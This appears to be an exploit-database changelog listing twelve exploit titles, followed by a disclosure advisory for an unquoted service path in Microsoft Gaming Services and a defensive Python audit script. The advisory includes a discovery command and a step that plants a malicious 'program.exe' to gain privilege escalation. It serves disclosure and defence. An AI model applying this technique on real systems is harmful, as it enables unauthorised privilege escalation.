
12 changes to exploits/shellcodes

HMA VPN 5.3 - Unquoted Service Path
Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation
Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path
WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated)
Cab Management System 1.0 - 'id' SQLi (Authenticated)
Microweber 1.2.11 - Remote Code Execution (RCE) (Authenticated)
Cab Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
Thinfinity VirtualUI 2.5.41.0 - IFRAME Injection
Thinfinity VirtualUI 2.5.26.2 - Information Disclosure
WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated)
FileCloud 21.2 - Cross-Site Request Forgery (CSRF)
Dbltek GoIP - Local File Inclusion

# Exploit Title: Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path
# Discovery by: Johto Robbie
# Discovery Date: May 12, 2021
# Tested Version: 2.52.13001.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 x64 Home

# Step to discover Unquoted Service Path:

Go to Start and type cmd. Enter the following command and press Enter:

C:\Users\Bang's>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\" | findstr /i /v """

Gaming Services    GamingServices       C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe       Auto
Gaming Services    GamingServicesNet    C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe    Auto

C:\Users\Bang's>sc qc "GamingServices"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: GamingServices
        TYPE               : 210  WIN32_PACKAGED_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Gaming Services
        DEPENDENCIES       : staterepository
        SERVICE_START_NAME : LocalSystem

The service path is not quoted, and it is contained in C:\Program Files. Put
a malicious application with the name "program.exe".

Stop & Start: GamingServices. "program.exe" will be executed.

#Exploit:

An unquoted service path in
Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe could lead to
privilege escalation during the installation process that is performed when
an executable file is registered. This could further lead to complete
compromise of confidentiality, integrity and availability.

#Timeline

May 12, 2021 - Reported to Microsoft
Feb 11, 2022 - Confirmed vulnerability has been fixed
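
For defenders, the wmic/findstr check above can be turned into an audit of exported service ImagePath values. The following is an added example, not part of the original advisory or of any Microsoft tooling. It flags executable paths that are unquoted and contain a space, lists the ambiguous prefix paths that should not exist on disk, and gives the quoted form of the value. The function names and all sample entries except the GamingServices path are constructed for illustration.

```python
import re

# Constructed sample ImagePath values; the first is the BINARY_PATH_NAME shown above.
SAMPLE = {
    "GamingServices": r"C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe",
    "QuotedSvc": r'"C:\Program Files\Vendor App\svc.exe" -k run',
    "NoSpaceSvc": r"C:\Windows\System32\svchost.exe -k netsvcs",
    "ArgsOnly": r"C:\Tools\agent.exe --config C:\My Data\a.ini",
}

# Executable portion of an unquoted command line: everything up to the first
# ".exe" that is followed by whitespace or the end of the string.
EXE_RE = re.compile(r"^(.*?\.exe)(?=\s|$)(.*)$", re.IGNORECASE)


def split_unquoted(image_path):
    """Return (exe, args) for an unquoted ImagePath, or None if quoted or unparsable."""
    value = image_path.strip()
    if value.startswith('"'):
        return None
    m = EXE_RE.match(value)
    return (m.group(1), m.group(2)) if m else None


def ambiguous_prefixes(exe):
    """Paths Windows may try before the real binary; an audit checks none of them exist."""
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def audit(services):
    """Map each service whose unquoted executable path contains a space to its findings."""
    findings = {}
    for name, image_path in services.items():
        parts = split_unquoted(image_path)
        if not parts or " " not in parts[0]:
            continue  # quoted, or spaces appear only in the arguments
        exe, args = parts
        findings[name] = {
            "check_absent": ambiguous_prefixes(exe),
            "quoted_fix": f'"{exe}"{args}',
        }
    return findings


if __name__ == "__main__":
    for name, f in audit(SAMPLE).items():
        print(name, f["check_absent"], f["quoted_fix"], sep="\n  ")
```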